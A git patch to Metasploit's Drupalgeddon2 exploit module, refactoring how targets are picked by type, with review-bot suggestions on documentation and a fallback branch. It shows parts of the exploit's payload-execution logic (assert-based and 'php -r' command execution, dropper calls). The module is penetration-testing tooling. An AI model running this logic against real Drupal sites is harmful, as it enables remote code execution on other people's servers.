From b8eb7f2a86c3f80bb4efa747b0c752e355fa83bf Mon Sep 17 00:00:00 2001
From: William Vu
Date: Wed, 25 Apr 2018 11:53:26 -0500
Subject: [PATCH] Set target type instead of regexing names
We're no longer matching multiple targets like /In-Memory/ or /Dropper/, so it makes sense to match on a specific value now. Old matching in this commit: 1900aa270813584ad6d45fcf985cc57fe86f7b16.
---
 .../unix/webapp/drupal_drupalgeddon2.rb | 44 ++++++++++++-------
 1 file changed, 28 insertions(+), 16 deletions(-)
diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
index fde174fe34..f7e2c09cc9 100644
--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -53,19 +53,23 @@ class MetasploitModule < Msf::Exploit::Remote
 #
 ['Automatic (PHP In-Memory)',
 'Platform' => 'php',
- 'Arch' => ARCH_PHP
+ 'Arch' => ARCH_PHP,
+ 'Type' => :php_memory
 ],
 ['Automatic (PHP Dropper)',
 'Platform' => 'php',
- 'Arch' => ARCH_PHP
+ 'Arch' => ARCH_PHP,
+ 'Type' => :php_dropper
 ],
 ['Automatic (Unix In-Memory)',
 'Platform' => 'unix',
- 'Arch' => ARCH_CMD
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_memory
 ],
 ['Automatic (Linux Dropper)',
 'Platform' => 'linux',
- 'Arch' => [ARCH_X86, ARCH_X64]
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :linux_dropper
 ],
 #
 # Drupal 7.x targets (PHP, cmd/unix, native)
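Review bot: The new `'Type'` key is added here with no comment saying what it is for or which values are valid, and the same four symbols are repeated across the twelve target entries in this hunk and the two that follow (`@@ -73,22` and `@@ -96,22`). A misspelled symbol in any single entry would not be noticed where it is defined. I would add a comment at the head of the target list, for example `# 'Type' selects the branch of the case on target['Type'] further down; one of :php_memory, :php_dropper, :unix_memory, :linux_dropper`. The target array starts before this hunk and ends in a later one.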
@@ -73,22 +77,26 @@ class MetasploitModule < Msf::Exploit::Remote
 ['Drupal 7.x (PHP In-Memory)',
 'Platform' => 'php',
 'Arch' => ARCH_PHP,
- 'Version' => Gem::Version.new('7.x')
+ 'Version' => Gem::Version.new('7.x'),
+ 'Type' => :php_memory
 ],
 ['Drupal 7.x (PHP Dropper)',
 'Platform' => 'php',
 'Arch' => ARCH_PHP,
- 'Version' => Gem::Version.new('7.x')
+ 'Version' => Gem::Version.new('7.x'),
+ 'Type' => :php_dropper
 ],
 ['Drupal 7.x (Unix In-Memory)',
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
- 'Version' => Gem::Version.new('7.x')
+ 'Version' => Gem::Version.new('7.x'),
+ 'Type' => :unix_memory
 ],
 ['Drupal 7.x (Linux Dropper)',
 'Platform' => 'linux',
 'Arch' => [ARCH_X86, ARCH_X64],
- 'Version' => Gem::Version.new('7.x')
+ 'Version' => Gem::Version.new('7.x'),
+ 'Type' => :linux_dropper
 ],
 #
 # Drupal 8.x targets (PHP, cmd/unix, native)
@@ -96,22 +104,26 @@ class MetasploitModule < Msf::Exploit::Remote
 ['Drupal 8.x (PHP In-Memory)',
 'Platform' => 'php',
 'Arch' => ARCH_PHP,
- 'Version' => Gem::Version.new('8.x')
+ 'Version' => Gem::Version.new('8.x'),
+ 'Type' => :php_memory
 ],
 ['Drupal 8.x (PHP Dropper)',
 'Platform' => 'php',
 'Arch' => ARCH_PHP,
- 'Version' => Gem::Version.new('8.x')
+ 'Version' => Gem::Version.new('8.x'),
+ 'Type' => :php_dropper
 ],
 ['Drupal 8.x (Unix In-Memory)',
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
- 'Version' => Gem::Version.new('8.x')
+ 'Version' => Gem::Version.new('8.x'),
+ 'Type' => :unix_memory
 ],
 ['Drupal 8.x (Linux Dropper)',
 'Platform' => 'linux',
 'Arch' => [ARCH_X86, ARCH_X64],
- 'Version' => Gem::Version.new('8.x')
+ 'Version' => Gem::Version.new('8.x'),
+ 'Type' => :linux_dropper
 ]
 ],
 'DefaultTarget' => 0, # Automatic (PHP In-Memory)
@@ -168,8 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 # NOTE: assert() is attempted first, then PHP_FUNC if that fails
- case target.name
- when /PHP In-Memory/
+ case target['Type']
+ when :php_memory
 execute_command(payload.encoded, func: 'assert')
 sleep(wfs_delay)
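Review bot: The `case target['Type']` introduced in the `@@ -168,8` hunk has no visible fallback branch. Its remaining `when` arms are in the `@@ -177,9` hunk and the end of the `case` lies outside both, so whether an `else` exists cannot be confirmed from this page. If there is none, a target whose `'Type'` is nil or misspelled matches no arm and the method falls through without reporting a configuration error. Consider closing the `case` with `else` followed by `fail_with(Failure::BadConfig, "Unsupported target type: #{target['Type'].inspect}")`.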
@@ -177,9 +189,9 @@ class MetasploitModule < Msf::Exploit::Remote
 # XXX: This will spawn a *very* obvious process
 execute_command("php -r '#{payload.encoded}'")
- when /Unix In-Memory/
+ when :unix_memory
 execute_command(payload.encoded)
- when /PHP Dropper/, /Linux Dropper/
+ when :php_dropper, :linux_dropper
 dropper_assert
 sleep(wfs_delay)